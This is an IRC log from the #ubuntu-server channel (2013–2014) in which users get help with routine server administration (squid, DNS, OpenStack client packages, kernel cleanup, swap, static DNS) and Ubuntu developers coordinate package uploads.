<bugzc> Are there any known issues with running squid 3.3 on ubuntu 12.04 server lts? The distro wont pull anything over 3.1 through apt for me.
<sarnold> bugzc: you could try compiling the saucy package on 12.04 LTS, or requesting a backport, but you'd have to be the one to keep up with security updates for squid if you do it yourself, and ask for new backports when there are security issues..
<sarnold> bugzc: or, you could download and compile the source and skip the packaging system, but that's harder to manage long-term. I'd probably try compiling the saucy package on 12.04 LTS first..
<bugzc> Thanks guys. To be honest I just need it stable. It sounds like the version from apt is just that.
<bugzc> Im using it in a transparent/inline cache proxy. ~1.5TB cache
<sarnold> zounds, that's a lot of cache :) hehe
<Dry_Lips> Hi, what TTL value do you guys recommend using?
<ikonia> that is down to your preference and needs/desires
<ikonia> it's unique to that person and their setup
<sarnold> I've never fiddled with it and never seemed to suffer for it :)
<Dry_Lips> Okay, if I'm in the process of setting up a site, a short TTL would be good?
<bugzc> sarnold: Yeah, it's for windows/av/etc updates for a small network
<ikonia> Dry_Lips: as I said, it depends on a a few things,
<sarnold> bugzc: nice! I bet that helped immensely. I tried doing that once, cheaply, and promptly found out that different hostnames in the update pool really did lead to multiple copies of data... for as tiny as my use was, it wasn't worth it.
<ikonia> it's not a "setting up new site = low ttl" model, you need to think about what you are doing and the systems you are interfacing with
<Dry_Lips> It's a small site with static html
<Dry_Lips> Just in the process of setting it up for the first time
<ikonia> what has that got to do with it ?
<sarnold> Dry_Lips: but where are your users? what will their internet links look like? how many IX centers will their packets need to traverse?
<ikonia> the content has nothing to do with it
<Dry_Lips> right...
<sarnold> Dry_Lips: I strongly recommend changing nothing.
<Dry_Lips> Okay, the default TTL of my registrars is 172816...
<hallyn> roaksoax: on bug 1231578, stgraber just fixed it i believe
<uvirtbot> Launchpad bug 1231578 in dnsmasq "dnsmasq binds bootp on all interfaces preventing other DHCP servers from starting" [Undecided,New] https://launchpad.net/bugs/1231578
<stgraber> ah, good, I'll add the bug number to the upload
<sarnold> oh, DNS TTL. I thought you meant IP TTL. stupid name collisions. :)
<Dry_Lips> Yep, DNS TTL
<Dry_Lips> lol
<hallyn> stgraber: :)
<sarnold> Dry_Lips: so, uh, yeah, 3600 or something might be fine to start with :) hehe, sheesh, sorry for being completely wrong. heh.
<stgraber> roaksoax, hallyn: uploaded
<Dry_Lips> sarnold, no problem, mate! and thanks for the suggestion :)
<hallyn> thanks
<adam_g> zul, whast the deal with the keystoneclient patch that hacks around httpretty?
<zul> adam_g:  its not in main and didnt have a change to do a MIR, dont think its in the archive either
<bugzc> sarnold: I've had a proof of concept type setup for a couple years now with a smaller drive running off an ancient p4 ibm box and even that helped quite a bit. but a lot of the stuff i have to cache is for software where you cant configure a proxy manually or its otherwise impractical. a transparent one is the way to go. I hope it works out :) The connection here is very slow..
<adam_g> zul, are you planning a new upstream release before saucy?
<adam_g> (of ksc)
<zul> yeah
<adam_g> zul, httpretty is used all over the test suite now
<zul> adam_g:  yeah i know :(
<adam_g> not sure how limited its use was when you added the patch
<zul> it was pretty limited
<zul> meh ill look into it
<adam_g> zul, is there any reason why we need new clients at this point?
<zul> unless they do a version bumb betwen now and release no
<zul> bump even
<adam_g> ya
<adam_g> wonder if they are frozen yet
<zul> clients are never frozen
<adam_g> they arent
<adam_g> but the requirements of the projects will be at some point
<adam_g> zul, http://paste.ubuntu.com/6159741/
<adam_g> all look to be satisfied currently. if we can get some kind of confirmation that those wont be bumping before havana, we should stop our saucy client builds and consider the current clients we have in saucy to be the versions we ship.
<adam_g> jamespage, thoughts?
<zul> +1 from me
<adam_g> zul, that said, it looks like the requirements repo's global-requirements.txt lists python-ceilometerclient>=1.0.5
<adam_g> (we have  1.0.3 currently)
<zul> ill do it today
<adam_g> VersionConflict: (oslo.config 1.2.0a3 (/usr/lib/python2.7/dist-packages), Requirement.parse('oslo.config>=1.2.0'))
<adam_g> also ^
<zul> oslo.config is pending beta freeze
<zul> (did that yesterday)
<adam_g> oh, awesome
<kurt_> adam_g: I am looking at this bug: https://bugs.launchpad.net/ubuntu/+source/python-quantumclient/+bug/1170849
<uvirtbot> Launchpad bug 1170849 in python-quantumclient "Cliff 1.3.2 is not available " [Medium,Invalid]
<kurt_> adam_g: how can I get python-cliff and finally nova and quantum clients installed for grizzly on precise?
<kurt_> I'm slightly confused on the resolution to this
<adam_g> kurt_, that bug shouldn't be valid. you're hitting it?
<kurt_> yeah, I can't install cliff
<adam_g> kurt_, from which grizzly repository?
<kurt_> I've tried precise-proposed, stable, etc
<adam_g> kurt_, so python-novaclient  and python-quantumclient are uninstallable on precise from the cloud archive grizzly-proposed/staging/updates pockets?
<kurt_> correct :)
<kurt_> I haven't tried all pockets
<adam_g> testing
<adam_g> kurt_, do you have a system up right now that is affected?
<kurt_> yup
<adam_g> kurt_, which versions of the client packages are you trying to pull?
<kurt_> just one for example is precise-proposed python-novaclient
<kurt_> http://pastebin.ubuntu.com/6159835/
<adam_g> kurt_, http://paste.ubuntu.com/6159834/
<kurt_> what's your set up? what am I missing for precise?
<jamespage> adam_g, +1
<adam_g> kurt_, nothing special, just "deb http://ubuntu-cloud.archive.canonical.com/ubuntu precise-updates/grizzly main"
<kurt_> you are grabbing from precise-updates...
<adam_g> kurt_, apt-cache policy python-novaclient ?
<kurt_> http://pastebin.ubuntu.com/6159856/
<kurt_> its cacheing from main?
<kurt_> adam_g: how can I fix that?
<adam_g> kurt_, i dont know what you've got configured in your sources. you should be able to add a pocket of the cloud archive (paste that deb line into /etc/apt/sources.list), apt-get update, then 'apt-get install python-novaclient'
<adam_g> you should'nt specify '-t precise-proposed'
<adam_g> all the dependencies required by anyhint offered in the grizzly cloud archive  should be resolvable either in the main ubuntu archive for precise, or the cloud archive pocket
<kurt_> the only thing I added for various reasons was "deb http://archive.ubuntu.com/ubuntu/ precise-proposed restricted main multiverse universe"
<adam_g> kurt_, i'd remove the precise-proposed entry unless you're actually testing something from precise-proposed, and add a source entry for the cloud archive
<kurt_> I am.  A lot of the juju stuff I need is there
<adam_g> ok
<kurt_> maybe temporarily change it?
<kurt_> or is there another way to do this?
<adam_g> no
<adam_g> setup access to the grizzly cloud archive, and install the clients from there
<kurt_> any hints on that? a web page RTFM referral is fine - just need a direction to be pointed in
<kurt_> you mean like good ol' wget?
<adam_g> kurt_, https://wiki.ubuntu.com/ServerTeam/CloudArchive#How_to_Enable_and_Use
<kurt_> thnx
<adam_g> zul, jamespage so it looks like there is a requirements freeze in effect upstream. if we can get ceilometer updated to match what is in global-requirements.txt, lets pull the client builds and pick them up when saucy is out
<zul> ceiloemeterclient right?
<adam_g> we can focus on getting and keeping the remaining projects building . seem to be some issues to be resolved
<adam_g> zul, oh yea.
<kurt_> adam_g: is order critical in the sources.list?  and will this affect any of my existing precise-proposed stuff?
<adam_g> kurt_, ordering doesn't matter. you can even put the line by itself in a file /etc/sources.list.d/ for easy deleting.
<kurt_> kk
<adam_g> kurt_,  if this is your desktop machine, and all you are pulling is those two clients, you might want to consider removing the entry after you have installed them. there are lots of other packages in the repository that may inadvertently upgrade unrelated stuff
<zul> adam_g:  did you have a look through the nova-lxc stuff?
<kurt_> adam_g: good idea
<adam_g> zul, briefly. commented on lack of tests and general pep8 stuff. we need test coverage
<zul> adam_g:  ack
<adam_g> zul, and i'd also like to see this deployed and tested with the rest of our CI
<zul> grrr
<zul> adam_g: https://code.launchpad.net/~zulcss/python-ceilometerclient/1.5.0/+merge/187879
<kurt_> adam_g: Yargh! LOL http://paste.ubuntu.com/6159997/ Something broken with quantum client
<kurt_> adam_g: apparently running in to this now: https://bugs.launchpad.net/ubuntu/+source/quantum/+bug/1211764
<uvirtbot> Launchpad bug 1211764 in quantum "Grizzly's python-quantumclient wrong dependencies" [Undecided,Confirmed]
<jamespage> kurt_, 'sudo apt-get install python-pyparsing'
<jamespage> kurt_, as a workaround
<jamespage> kurt_, the package lacks the correct versioned dependency for the cloud archive
<kurt_> jamespage: ok, i'll try that
<zul> adam_g:  can you file a FFE for ceilometerclient....im out
 * hallyn heading out for a bit - be around later and tonight
<adam_g> jamespage, smoser http://people.canonical.com/~agandelman/ca/folsom/policykit-1-0.104-2ubuntu1.1~cloud0/ and http://people.canonical.com/~agandelman/ca/grizzly/policykit-1-0.105-1ubuntu1.1~cloud0/ are new packages needed to fix FTBFS of libvirt security fix in folsom + grizzly
<smoser> oh. joy.
<smoser> adam_g, is there a bug for that ?
<adam_g> smoser, for the CA FTBFS? no
<smoser> sure. i guess. did libvirt gain a build-depends ?
<smoser> what was the security bug?
<adam_g> smoser, no bug, CVE-2013-4311. part of libvirt security update  was adding a version requirement on policykit in respective distro to pull in a ensure it pulls in a security fix there
<uvirtbot> adam_g: ** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem.  When the candidate has been publicized, the details for this candidate will be provided. (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4311)
<smoser> k
<arosales> smoser, per jamespage last comment in https://bugs.launchpad.net/ubuntu/+bug/1227425
<uvirtbot> Launchpad bug 1227425 in ubuntu "Cloud images do not need apt-xapian-index" [High,New]
<arosales> will the SRU to apt-xapian-index resolve the issue, or is the the SRU that is causing the issue?
<smoser> arosales, you need a new cloud image to reoslve it.
<smoser> the sru caused it.
<smoser> by causing 'apt-get update && apt-get dist-upgrade' to install a new package
<smoser> well, newerver version of that package
<smoser> and installation of that packkage then does the silly stuff
<arosales> smoser, ok. So this should resolve it self in subsequent updates. --thanks.
<smoser> when a new released cloud iamge is made the problem will go away.
<smoser> untill the next time there is an update to that package.
<arosales> ugh
<arosales> smoser, your thoughts on just removing that package?
<arosales> I guess it only affects smaller instances, but is it worth the cost?
<smoser> arosales, the package is pointless and annoying to us.
<smoser> but it is a 'Recommends' of aptitude, which is probably a commonly used package by real users.
<arosales> ah
<arosales> smoser, so your suggestion is to keep it as is
<smoser> no. i hate that package.
<smoser> and i dont actually know why or if aptitude needs apt-xapian-index to run.
<smoser> i'd like to fix it by dropping the package from the cloud iamges, but doing that means dropping the 'Recommends' in aptitude to a Suggests.
<xander452> it seems the esacpe characters in the /etc/issue file are not being recognized. at ssh login they just show up as \n \l. any ideas why? i cant see that the issue file needs anything more than the '\' to control to codes.
<shauno> xander452: I'm not sure they're meant to be; that's why you'd usually use /etc/issue.net for such applications  (those sequences are usually parsed by getty, which ssh doesn't use)
<xander452> shauno: thanks for the reply. i made sure the BANNER line sshd points to issue.net. the issue.net file was empty so i added \n \l. there was no change when i ssh to that ip.
<mattwj2002> the lts of 12.04 is until 2017?
<mattwj2002> is no one here?
<mattwj2002> 384 people in the room and no chat?
<JanC> 5 years, so yes
<mattwj2002> thanks janc
<mattwj2002> janc is that full support or does it taper down slowly?
<mattwj2002> like in 2016 limited support and 2017 no support
<JanC> it's updates for security and (major) bugs until April 2017 for packages in main  and (to some degree) for packages in universe too
<mattwj2002> thanks JanC
<mattwj2002> :D
<mattwj2002> I built a couple of small servers with ubuntu 12.04
<mattwj2002> I was just wondering what the deal was with it
<mattwj2002> nothing business critical
<mattwj2002> :)
#ubuntu-server 2013-09-27
<sarnold> mattwj2002: full details are here: https://wiki.ubuntu.com/Releases
<sarnold> mattwj2002: 12.04 LTS is the first to get five years of support for desktop and server components, earlier releases had the tiers you mentioned, and it was complicated. :)
<mattwj2002> :)
<mattwj2002> sarnold: I am thinking about building a ubuntu 4.10 server....what do you think?
<sarnold> mattwj2002: knock yourself out. just don't put it on the public internet. :)
<mattwj2002> haha
<mattwj2002> why?
<mattwj2002> ;)
<sarnold> mattwj2002: because it hasn't had any security updates since april 2006.
<mattwj2002> I know just kidding
<mattwj2002> :D
<mattwj2002> actually it wouldn't be horrible behind nat....
<mattwj2002> nat protects you for quite a bit
<mattwj2002> *from
<mattwj2002> but I agree security holes city :)
<jrwren> might be a fun exercise to attempt to exploit it, or run it as base for honeypot
<mattwj2002> indeed
<mattwj2002> I guarantee there are servers on the public internet that are older than that
<mattwj2002> then again that is why they get hacked
<mattwj2002> :)
<DarylXian> I'm setting up kerberos on Ubu12LTS.  Tutorials and man page refer to test apps, `sserver` and `sclient`.  I've installed pkgs: krb5-admin-server,krb5-kdc,krb5-config,krb5-user,krb5-clients.  I can find no trace of those bins.
<DarylXian> Any help/hint as to where they hide?
<TheLordOfTime> is there a reason apt is preferring IPv6 servers even though I've only enabled IPv4 on my network connection?
<TheLordOfTime> it's causing apt to not be able to download any updates or connect to the update servers.
<pandaroot-gama> i am creating a customized install for ubuntu server and following this guide. https://help.ubuntu.com/community/LiveCDCustomizationFromScratch
<pandaroot-gama> in this guide it's no where mention that it is for server or for desktop.
<pandaroot-gama> how can i create a customized server ?
<cassiel> hi, I am facing a problem with my ubuntuserver and broadcom nextreme
<cassiel> server is up and running but it does shows up only one network interface with lspci
<cassiel> on a debian server, same network card, it shows correctly the four interfaces
<cassiel> any hints?
<PaulePanter> What are these `resume` and `wait-for-root` processes when I restart the server and check the boot process with `bootchart`?
<SuperMatt> Hi all, I've been told to report bug 1231901 to you
<uvirtbot> Launchpad bug 1231901 in nagios3 "Installing Nagios3 and Apache2 in Saucy does not enable the cgi mod, which is required" [Undecided,New] https://launchpad.net/bugs/1231901
<jamespage> SuperMatt, trying to reproduce now
<jamespage> thanks for the poke - good to know these things close to release
<SuperMatt> jamespage: did you confirm it?
<jamespage> SuperMatt, yes - just seeing if its a regression from raring
<SuperMatt> cool :D
<jamespage> SuperMatt, interestingly nagios3 has never enabled the cgi module
<jamespage> so I suspect a change in behaviour in a dependency
<jamespage> (probably apache itself)
<jamespage> SuperMatt, ah - I see
<jamespage> mod-php5 dropped its dependency on the prefork package
<jamespage> SuperMatt, urgh - OK
<zetheroo> I added a new NIC to one of our Ubuntu 12.04 servers ... lshw shows the following: http://paste.ubuntu.com/6162438/
<Sling> zetheroo: what does dmesg show about the network card(s) ?
<Sling> perhaps the driver/module for this chipset is missing in your system
<zetheroo> dmesg output: http://paste.ubuntu.com/6162462/
<zetheroo> Sling: I am not sure what I am looking for in there ^
<blizzkid> Lo all. I'm trying to get started with apple website notifications, following the doc at https://developer.apple.com/library/prerelease/mac/documentation/NetworkingInternet/Conceptual/NotificationProgrammingGuideForWebsites/PushNotifications/PushNotifications.html#//apple_ref/doc/uid/TP40013225-CH3-SW1. Now I'm stuck with "Configuring Your Web Service Endpoints". How can I do this on ubuntu + apache? (It says I need to configure a RESTful web
<blizzkid> service, but I have no clue how to so this) (asked the same question in #macosx, since it's a bit about both)
<zetheroo> How to get a newly installed network card to work in Ubuntu 12.04 Server ?
<zetheroo> ifconfig shows no new interface
<bxz> and ifconfig -a ?
<zetheroo> bxz: it shows up as eth2
<zetheroo> http://paste.ubuntu.com/6162520/
<bxz> zetheroo: sudo ifup eth2
<zetheroo> Ignoring unknown interface eth2=eth2.
<bxz> ifdown eth2; ifup eth2
<bxz> you might want to configure eth2 interface in /etc/network/interfaces file before though
<zetheroo> I see ...
<bxz> when done you can try to run:  '/etc/init.d/networking restart'
<irv> is there an easy way to expand my /boot partition after install?
<irv> mine's sittin at about 99.6% full :P
<bxz> irv: i would just delete old kernels and leave it be
<irv> what's the command for that again?
<irv> something autoremove?
<bxz> apt-get purge linux-image-xxx
<irv> any way to see which ones are there? just ls /boot?
<smoser> utlemming, https://code.launchpad.net/~utlemming/cloud-init/azure-disk_format/+merge/187805
<bxz> irv: dpkg -l | grep linux-image
<bxz> irv: just leave the one you are on (uname -r)
<irv> k so i have a bunch of linux-image-3.2.0.xx and one linux-image-server
<henkjan> i'm using an apt-hook to remove old kernels
<henkjan> https://github.com/henkjan/purgekernel/
<irv> do i k eep linux-image-server as well i presume?
<irv> that's like in addition to the regular kernel?
<irv> bkz: thx
<bxz> don't know. i would keep it
<henkjan> linux-image-server is a virtual package
<henkjan> keep that one installed
<irv> hmm any time i try to apt-get purge linux-image-3.2.xx i'm getting a message about unmet dependencies and to run apt-get -f install
<irv> to get a diff version of linux-headers-server
<irv> but when i run that, it fails (i presume due to the full disk)_
<irv> another way to purge a few of these kernels so i can run -f
<irv> that won't go and do all the dependency checking
<mardraum> you have to manually move them elsewhere
<mardraum> to free up enough room for your existing apt transaction to complete
<mardraum> it's very ugly, but I have found no better way
<irv> kk
<Dry_Lips> Hi, how big should I make my swapfile for my VPS? The plan I'm on gives me 1GB RAM, would it be overkill to make a swapfile that is 2 GB? My VPS has SSD storage, btw
<jamespage> adam_g, I ended up completely reduxing swift-proxy in the end
<jamespage> seems to work OK
<jrwren> Dry_Lips: use no swap and run swapspace daemon
<Dry_Lips> jrwren, I had newer heard about swapspace before... But it's not being maintained anymore?
<Dry_Lips> jrwren, anyways, thanks for the tip, I'll be looking into it! :-)
<jrwren> Dry_Lips: its not maintained becuase its "done" :)
<Dry_Lips> Yeah, I noticed upon closer inspection... :) But you'll have to build it from source, jrwen? I also discovered that I couldn't create an ordinary swap, because apparently my VPS is on openVZ... Will swapspace work in this case?
<Dry_Lips> (When I tried to run the swapon command, I got an error message stating that it wasn't permitted)
<jamespage> adam_g, any thoughts on the get_or_generate_secret stuff in openstack-dashboard?
<jamespage> adam_g, I'm reticent to open up write acess to /etc/openstack-dashboard
<jamespage> it should really be doing /var/lib/horizon for generate
<jrwren> Dry_Lips: what version of server? its available to me. I think it is from universe.
<jrwren> Dry_Lips: openvz is like LXC. you are running a shared kernel, so yes, you don't get to add memory or swap. You'll have ot make to with the limits they give you.
<Dry_Lips> jrwren: Okay, I found it, it was in the repos. But you're saying it won't work since I'm on openVZ?
<jrwren> Dry_Lips: i don't know. I don't know openvz.
<jrwren> if swapon does not work for you, nothing will, AFAIK
<Dry_Lips> swapon definitively doesn't work...
<jrwren> looks like amount of swap is a host, not guest function: http://wiki.openvz.org/VSwap  This is the nature of shared hosting :)
<Dry_Lips> hmmm
<Dry_Lips> When I installed swapspace the daemon started up automatically...
<Dry_Lips> But I guess the question is what happens if it runs out of RAM...
<jrwren> it makes a new swap file.
<jrwren> it adds and removes swap space as needed.
<Dry_Lips> jrwren: yeah, that's what I thought... But since it's just a daemon, it will not fail, the same way that adding swap will under openVZ?
<jrwren> no, it will fail.
<jrwren> adding swap makes a syscall.
<jrwren> its the syscall of swapon which is failing.
<jrwren> if you aren't sure, run your swapon wiht strace
<Dry_Lips> jrwren: okay, so *swapspace* uses the syscall of swapon?
<Dry_Lips> jrwren: okay, thanks for your help. If I understood you correctly swapspace will fail... I guess I've learned something new about openvz... :-)
<jamespage> adam_g, I execd'ed all of the openstack redux branches
<adam_g> jamespage, i mentioned to smoser yesterday, but we need to backport policykit from (Raring, Quantal) for libvirt securitgy update to build in (Folsom, Grizzly). http://people.canonical.com/~agandelman/ca/folsom/policykit-1-0.104-2ubuntu1.1~cloud0/ + http://people.canonical.com/~agandelman/ca/grizzly/policykit-1-0.105-1ubuntu1.1~cloud0/
<smoser> adam_g, you can / should just upload those to -staging, right?
<adam_g> the delta between precise + quantal is a small packaging delta, but from precise to raring is a full upstream
<adam_g> smoser, yea
<jamespage> adam_g, +1
<adam_g> smoser, but im a bit cautious of bumping new upstream releases in stable pockets, especially since i dont know much about policykit
<jamespage> adam_g, oh - one second
<jamespage> adam_g, hmm - I see the dilema
<smoser> well, yeah. i agree. but -staging is where we would test this.
<smoser> no?
<jamespage> yes
<jamespage> adam_g, upload to staging, get things building and lets see what pops
<babinlonston> Hi All ,  If am Having a Server Are a VPS , What Are the Security Thinks Basically i have to DO ? Will u please Guide me Guys ?Any Minimum 10 Important Points Need .
<zul> adam_g: https://code.launchpad.net/~zulcss/nova/reqs-refreshed/+merge/188120
<adam_g> jamespage, ugh
<adam_g> Missing build dependencies: policykit-1 (>= 0.105-1ubuntu1.1)
<adam_g> 0.105-1ubuntu1.1~cloud0 < 0.105-1ubuntu1.1
<jamespage> bah
<jamespage> that why the ~ is important
<adam_g> jamespage, carry a delta adding that to d/control of libvirt?
<zul> adam_g:  where you pushing stuff to the cloud-archive ppa?
<adam_g> zul, yeah, doing a bulk update  of everything thats outdated
<jkyle> howdy
<jkyle> I'm having an issue where my kerne override installer option in my preseed is being ignored in certain conditions. It works in the environments where we have an apt cacher proxy for pxe'd hosts. In environments that lack this setting, they flag is ignored and the default (3.8) kernel is installed instead
<jkyle> anyone seen that behavior before?
<jkyle> ok, so I've determined the problem is that the installer is not allowing me to pull down kernels from upstream mirrors for use in the preseed's override-image directive
<jkyle> I only have these as options:
<jkyle> # Choices: linux-signed-generic-lts-raring,linux-generic-lts-raring,linux-signed-image-generic-lts-raring,linux-image-generic-lts-raring,linux-signed-image-3.8.0-29-generic,linux-image-3.8.0-29-generic, none
<jkyle> note that, basically, my only option is the 3.8.0-29 kernel, which breaks ovs.
<jkyle> so it looks like the 3.5 kernel's been pulled from the main archives
 * jkyle grumbles about  kernel upgrades that change the ABI in minor version bumps of LTS releases
<jkyle> kind of contrary to what an LTS/enterprise release is supposed to do
<sarnold> jkyle: are you using newer 12.04.3 LTS images or something? I would expect them to only have the newer HWE kernels.. can you try again with an original 12.04 LTS disc?
<jkyle> yeah
<sarnold> (keeping in mind I'm in way beyond my experience even at that statement :) hehe
<jkyle> we were using the 12.04.2, but when they were archived to the old versions repo the build had a corrupted local mirror with broken dependency chains. I think I've found a work around
 * jkyle is testing
<jkyle> looks like the linux-generic-lts-quantal kernel is still in the precise-security repo. I'm going to try to include that as the suite
<sarnold> ah, that ought to work, I don't expect packages ever get removed from the security pocket, but it doesn't feel right, hehe
<jkyle> made an ask ubuntu post: http://askubuntu.com/questions/350929/installing-linux-generic-lts-quantal-in-12-04-3-via-preseed
<mgriffin> if you dont see a particular package in your repo, is the normal method to get it installed a ppa? are there popular third party repos with packages not in the main repos?
<mgriffin> in this case, i am looking for mysql sandbox but otherwise curious (it can be installed via cpan)
<jkyle> mgriffin: most use a ppa, whether you want to do that or just use cpan depends on your needs
<mgriffin> just making sure there isnt something like EPEL that I was unaware of
<mgriffin> how does one go about seeing if a ppa might exist, i have had mixed results just hitting, eg google
<mgriffin> (i dont ubuntu as much as $otherdistro)
<sarnold> mgriffin: so far as I know, there isn't much "formal" to collect and categorize ppas; so much more is packaged than many other distros that there's less need for it. So the downside is there's not much help for finding them when you -do- need them..
<mgriffin> :(
<mgriffin> seems i need a ppa every time i use ubuntu (newer packages)
<mgriffin> eg mysql 5.6 on an otherwise LTS platform
<jkyle> mgriffin: ppa's are hosted on launcpad.net
<jkyle> launchpad.net*
<jkyle> mgriffin: building a package and hosting your own PPA is not entirely painful though. . . only moderately so
 * mgriffin just broke launchpad
#ubuntu-server 2013-09-28
<Diegonat> what do i need to do to register ubuntu to spacewalk??
<linux|newb> how do I set DNS to 8.8.8.8 permanently on 12.4?
<linux|newb> adding to resolv.conf doesn't hold
<linux|newb> after reboot. admittedly I don't reboot often and I could automate the adding of it after each reboot but it seems convoluted when I'm probably missing something obvious
<lenios> linux|newb, you can add it to /etc/network/interfaces
<linux|newb> lenios: "nameserver 8.8.8.8" ?
<lenios> "dns-nameservers 8.8.8.8" on the interface you want to configure
<linux|newb> lenios: ta
<lenios> you can also change what resolvconf is putting in /etc/resolv.conf by adding your nameserver to /etc/resolvconf/resolv.conf.d/base
<lenios> or /etc/resolvconf/resolv.conf.d/head
<lenios> base is what's used if when other files are empty, head is always on top
<lenios> -if
<jrwren> linux|newb: or echo 'nameserver 8.8.8.8' | sudo resolvconf -a eth0.goog
<jrwren> to ask resolvconf to add it for you.
<linux|newb> jrwren: that's nice
<Diegonat> guys? how do you manage different servers ?? Especially updates and packages. I am talking about something spacewalk.
<giovani> can someone explain to me why the sama dpkg configure script seems to be so utterly broken on 13.04?
<giovani> no matter what samba role I select in the dpkg-configure script -- it seems to configure samba as a domain controller
<giovani> even if I select 'none' as the role
<giovani> then, when I try to reconfigure samba, I get this in the logs after trying to start: 'You should start smbd/nmbd/winbindd instead for domain member and standalone file server tasks' -- except that, smbd/nmbd/winbindd don't seem to exist anymore in ubuntu
<giovani> I've resolved my issue -- looks like the samba4 package is missing these tools
<giovani> have to use the samba package
<giovani> s/tools/daemons/
<ggherdov> hello. From what I understand, the ubuntu way of dynamically load an apache module is via `a2enmod`, and not using the `LoadModule` directive in /etc/apache2/apache2.conf . Correct?
#ubuntu-server 2013-09-29
<yoshi435> Hi
<Kwayzu> Anyone able to help me with an error?  I think I need to add a public key but heres the error: GPG error: http://plex.r.worldssl.net lucid Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 43525C28E533491A
<PaulePanter> Does the file `/etc/modules` contain `lp` on your server?
<PaulePanter> I wonder if my hosting provider added it or if it is there by default.
<PaulePanter> How do I find out, what the default `/etc/modules` looks like without installing Ubuntu?
<shauno> I believe the default is simply empty (well, it has comments, but no entries)
<PaulePanter> That would be what I have thought and how I know it from Debian.
<PaulePanter> Then my hosting provider Hetzner has some stupid changes in their provided image. :(
<ggherdov> Hello. I am testing my understanding of reverse proxies with a toy example on my laptop, which I am failing at making it work.
<ggherdov> On my laptop (host) I run a virtual machine (guest). Both host and guest have apache 2.2 running.
<ggherdov> The host accesses guest's document root pointing the browser to http://localhost:8080/.
<ggherdov> My goal is to use mod_proxy to make the guest content accessible from host at http://localhost/foo/.
<ggherdov> The problem that I observe is that relative links on pages served by the guest (eg: b/b.html) aren't translated (eg: foo/b/b.html), and I get a 404.
<ggherdov> Here relevant snippets of my config and files and loaded modules: http://bpaste.net/show/0oFiIeK9TZTjUOuzLsRd/
<ggherdov> I am good at getting http://localhost/foo/a.html, but the relative link inside that page isn't mapped to the host "name-space".
<Zigara> any suggestions for authoritative DNS server software?
<andol> Zigara: BIND is always a safe choice.
<Zigara> well, in the end it was between bind and NSD, going to try NSD first, and I can fall back to bind if all fails since its the same zone format
<crass> has anyone ever resized an active LUKS partition? I've done this before, but the last few times I've had to deventually bring it offline
<crass> I think one gotcha is it has a detached header, but I'm not sure why that should even matter really
#ubuntu-server 2014-09-22
<twb> I need a quick sanity check, please -- I have a server with linux-image-2.6.32-64-virtual installed, but uname -a is saying 2.6.32-64-server.
<twb> Do -virtual builds normally report themselves as -server?
<tarpman> twb: iirc, yes; and http://packages.ubuntu.com/lucid-updates/amd64/linux-image-2.6.32-65-virtual/filelist agrees
<twb> OK, thanks
<twb> (Didn't realize it would show up there, I was thinking it was only going into the local string in /boot/config-XXX.)
<jetole> Hey! Is anyone in here pretty familiar with likewise open / PBIS open ?
<Kane_> Hey, Just refered here. You guys think 14 is a good for a Avg website and website like uses no GUI etc. I think it has a 5 year support plan?
<|\n> hey, guys! when ksplice was in beta i was testing it on my home server out of curiousity and it was amazing, now i have not-that-important production vds on kvm with 14.04 server, any hints on if its license free in this case or if it is even possible under kvm?
<Sachiru> Does it have to be kSplice, or do you just want no-reboot updates?
<|\n> Sachiru, the second is my end-goal, yeah! thank you for paying attention also =)
<Sachiru> Hmm.
<Sachiru> There are methods to achieve no-reboot updates, but they are non-trivial to apply (kExec, KernelCare, etc.)
<|\n> Sachiru, any of them applied at least on non-critical places in production by chance?
<Sachiru> Sure.
<Sachiru> kExec is a standard Linux utility
<|\n> Sachiru, thank you, gonna investigate those
<Sachiru> Look into https://en.wikipedia.org/wiki/Kexec
<Sachiru> Another is KernelCare, just as robust as kSplice, but less pricy
<|\n> reading kexec unresolved issues part in canonical's manpages, seems fine so far
<Sachiru> IMHO rebootless upgrades aren't really ideal. Want 99.999% uptime? Build a second machine and a load balancer. Consolidating everything onto one server is suicide, no matter how much you try to harden it, if it goes down (and it inevitably will) everything will go down with it.
<|\n> how about backups? =)
<Sachiru> A backup will not prevent service interruption.
<Sachiru> Load-balancing and redundancy will.
<|\n> it is not critical box
<|\n> and you are totally right
<Sachiru> Backups are there to recover from failure. Redundancy is there to *prevent* failure
<Vladimir> Maybe wrong channel, but I wonder if there's a command to check what devices my packets go to first in my layer 2 network from ubuntu server machine?
<rbasak> Vladimir: tcpdump?
<Vladimir> oh okey
<Vladimir> =)
<rbasak> There's an option to show you MAC addresses.
<Vladimir> arp -a?
<Vladimir> arp -a seems to show the last mac address, I need the first hop mac adress
<lordievader> Vladimir: traceroute?
<Vladimir> lordievader: I tried it also
<lordievader> That will at least report the routers in between source and destination.
<Vladimir> lordievader: yeah but it'
<rbasak> First hop mac address?
<Vladimir> it's a Layer 2 network
<rbasak> You mean a layer 2 hop there?
<Vladimir> so no routers invovlved
<rbasak> Or a layer 3 hop?
<Vladimir> layer 2 hop
<lordievader> Ah, right.
<rbasak> I'm not sure that's possible. Switches hide that from you as part of the Ethernet protocol.
<rbasak> You might be able to get something out of spanning tree protocol or something like that though.
<rbasak> A server just isn't aware of what's on the first hop. Switches don't even have to have MAC addresses.
<Vladimir> thing is, we have a wifi controller in the network, and want to know if the packets go through it or not since the server is on the WIFI for the moment
<Vladimir> I better ask on another channel, no worries=)
<rbasak> Get a switch with a mirror port (or a hub), put it "in the way" and use tcpdump on the mirror port.
<rbasak> Or used managed switches and query them for their MAC address tables.
<Vladimir> rbasak: thanks=)
<halvors> Hi! I need to be able to login to my ubuntu-server using Active Directory login credentials. Is there a easy way to implement this?
<Mississauga> any reason for NOT installing latest server version? empty hard disk?
<Mississauga> is it safer to go with an older version, say 13.x ?
<Pici> Mississauga: If you need to go with an older release, at least pick 12.04 LTS.
<Mississauga> I rather go with 14.04 but I wondered if there are bugs
<cfhowlett> Mississauga, 14.04 has reached release point .1      and I've heard few complaints in #ubuntu-server
<lordievader> For me it has been very stable so far.
<cemc> hi. I have ubuntu server 14.04 installed, with eth0 dhcp. I'm trying to set my own static DNS servers, disregarding the DHCP ones. I created /etc/resolv.conf file (not a symlink to resolvconf) but it still gets overwritten at reboot
<RoyK> Mississauga: 12.04 is an LTS and is good. 14.04 is also an LTS and has been out for a while and is also good
<RoyK> Mississauga: 13.04 and 13.10 are *not* LTS releases and shouldn't be used on servers (IMO)
<RoyK> Mississauga: I'd use 14.04 if I were to install ubuntu on a new server
